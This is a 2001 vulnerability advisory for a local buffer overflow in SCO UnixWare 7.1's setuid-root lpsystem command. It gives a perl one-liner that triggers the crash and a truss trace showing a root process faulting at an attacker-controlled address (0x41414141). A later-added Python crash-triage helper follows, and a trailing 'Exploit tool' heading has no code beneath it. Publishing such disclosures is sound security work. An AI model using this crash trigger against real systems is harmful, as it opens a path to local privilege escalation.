© Neurowork™ 2010. All rights reserved.
Syb Security is a business unit of Neurowork™.

Advisories

SYBSEC-ADV04: SCO UnixWare 7 lpsystem Local Buffer Overflow Exploit

Title: SCO UnixWare 7 lpsystem Local Buffer Overflow Exploit
ID: SYBSEC-ADV04
Severity: HIGH - Local Buffer Overflow
History:
04.OCT.2001 Vulnerability discovered
15.OCT.2001 Vendor contacted
Scope: Local Buffer Overflow Vulnerability
Platforms: SCO UnixWare 7.1
Author:
URL: http://www.sybsecurity.com/advisors/SYBSEC-ADV04-UnixWare_7_lpsystem_Local_Buffer_Overflow_Exploit
Release: Public
Overview
The lpsystem command registers remote systems with the print service.
Affected versions
The vulnerability has been reported in the following SCO Server version:
SCO Server UnixWare 7.1
Description
The lpsystem command is obsolete and could be removed at any time. The print system no longer uses the information generated by lpsystem. The local buffer overflow vulnerability gives an intruder elevated privileges on the system.
Workaround
Upgrade to the software version available for download from:
http://www.sco.com
Acknowledgments
This vulnerability has been found and researched by:
- Alex Hernandez <ahernandez [at] sybsecurity [dot] com>
References
Details
Local Buffer Overflow:

# ls -la /usr/sbin/lpsystem
---s--x--x 1 root lp 41840 Ap 4 998 /usr/sbin/lpsystem
#
# /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`
Segmentation Fault - core dumped
#

* Mapped with truss:

# truss /usr/sbin/lpsystem `perl -e '{print "A"x100000}'`

[...]

read(3, " A A A A A A A A A A A A".., 1032) = 1032
write(4, " A A A A A A A A A A A A".., 1023) = 1023
read(3, " A A A A A A A A A A A A".., 1032) = 1032
write(4, " A A A A A A A A A A A A".., 1023) = 1023
read(3, " A A A A A A A A A A A A".., 1032) = 475
write(4, " A A A A A A A A A A A A".., 1023) = 1023
read(3, 0x0830B740, 1032) = 0
close(3) = 0
write(4, " A A A A A A A A A A A A".., 549) = 549
close(4) = 0
rename("/etc/lp/lpdatAAA00012y", "/etc/lp/Systems") = 0
lvlfile("/etc/lp/Systems", 2, 0x07F53C5C) Err#89 ENOSYS
open("/etc/lp/Systems", O_WRONLY|O_APPEND, 0664) = 3
fcntl(3, F_SETLK, 0x07F53C2C) = 0
fcntl(3, F_GETFL, 0x00000009) = 9
lseek64(3, 0, 2) = 1542283
write(3, " A A A A A A A A A A A A".., 1000000) = 1000000
write(3, " : x : - : s 5 : - : 1 0".., 20) = 20
close(3) = 0
lvlfile("/etc/lp/Systems", 2, 0x07F53C90) Err#89 ENOSYS
xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F53344) = 0
open("/var/spool/lp/fifos/FIFO", O_WRONLY|O_NDELAY, 0) = 3
close(3) = 0
xstat(2, "/var/spool/lp/fifos/FIFO", 0x07F533E0) = 0
open("/var/spool/lp/fifos/FIFO", O_RDWR, 0) = 3
ioctl(3, I_CANPUT, 0x00000000) = 1
getgid() = 103 [ 103 ]
getuid() = 0 [ 0 ]
Incurred fault #6, FLTBOUNDS %pc = 0x08072410
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
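
A crash-triage helper for the truss trace above, added here as an example (it is not part of the original advisory). It extracts the fault, program counter, faulting address and uid, then checks whether the faulting address consists only of the 0x41 ('A') filler byte from the oversized argument, which is what marks the crash as input-controlled. The function name `triage` and the embedded sample lines are constructed for this example.

```python
import re

# Constructed sample: the closing lines of the truss trace shown in the advisory.
SAMPLE_TRACE = """\
getgid() = 103 [ 103 ]
getuid() = 0 [ 0 ]
Incurred fault #6, FLTBOUNDS %pc = 0x08072410
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***
"""

FAULT_RE = re.compile(r"Incurred fault #\d+, (\w+)\s+%pc = (0x[0-9A-Fa-f]+)")
SIGINFO_RE = re.compile(r"siginfo: (\w+) (\w+) addr=(0x[0-9A-Fa-f]+)")
UID_RE = re.compile(r"getuid\(\)\s*=\s*(\d+)")


def triage(trace: str, filler: bytes = b"A") -> dict:
    """Summarise a truss crash trace (hypothetical helper, not a truss feature)."""
    report = {"fault": None, "pc": None, "signal": None, "code": None,
              "addr": None, "uid": None, "addr_is_filler": False}
    for line in trace.splitlines():
        if m := FAULT_RE.search(line):
            report["fault"], report["pc"] = m.group(1), int(m.group(2), 16)
        elif m := SIGINFO_RE.search(line):
            report["signal"], report["code"] = m.group(1), m.group(2)
            report["addr"] = int(m.group(3), 16)
        elif m := UID_RE.search(line):
            report["uid"] = int(m.group(1))
    if report["addr"] is not None:
        # Treat the address as at least a 32-bit pointer. If every byte equals
        # the filler byte, the pointer was overwritten by the argument data.
        width = max(4, (report["addr"].bit_length() + 7) // 8)
        raw = report["addr"].to_bytes(width, "big")
        report["addr_is_filler"] = raw == filler * width
    # A uid of 0 in the trace means the crash happened in a root process.
    report["privileged"] = report["uid"] == 0
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_TRACE).items():
        print(f"{key}: {value}")
```
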

Exploit tool